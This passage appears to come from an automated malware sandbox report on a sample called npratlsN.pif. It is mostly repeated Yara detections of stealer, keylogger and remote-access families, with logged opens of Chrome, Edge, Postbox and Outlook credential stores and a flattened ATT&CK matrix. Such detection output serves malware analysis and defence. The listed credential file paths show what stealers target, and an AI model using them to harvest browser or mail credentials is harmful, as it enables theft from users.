          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.3083897007.000000003438B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3075519147.0000000020A7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076785533.0000000028C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 8112, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 3980, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 7692, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\Public\Libraries\npratlsN.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\Public\Libraries\npratlsN.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\Public\Libraries\npratlsN.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\Public\Libraries\npratlsN.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\Public\Libraries\npratlsN.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\Public\Libraries\npratlsN.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\Public\Libraries\npratlsN.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\Public\Libraries\npratlsN.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: C:\Users\Public\Libraries\npratlsN.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\Public\Libraries\npratlsN.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: C:\Users\Public\Libraries\npratlsN.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 8112, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 3980, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 7692, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected PureLog Stealer
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 8112, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 3980, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 7692, type: MEMORYSTR
          Yara detected VIP Keylogger
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.3083897007.000000003438B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3075519147.0000000020A7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076785533.0000000028C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 8112, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 3980, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 7692, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information22
          Scripting          		1
          Valid Accounts          		1
          Native API          		22
          Scripting          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services11
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          Valid Accounts          		11
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          System Network Connections Discovery          		Remote Desktop Protocol1
          Data from Local System          		13
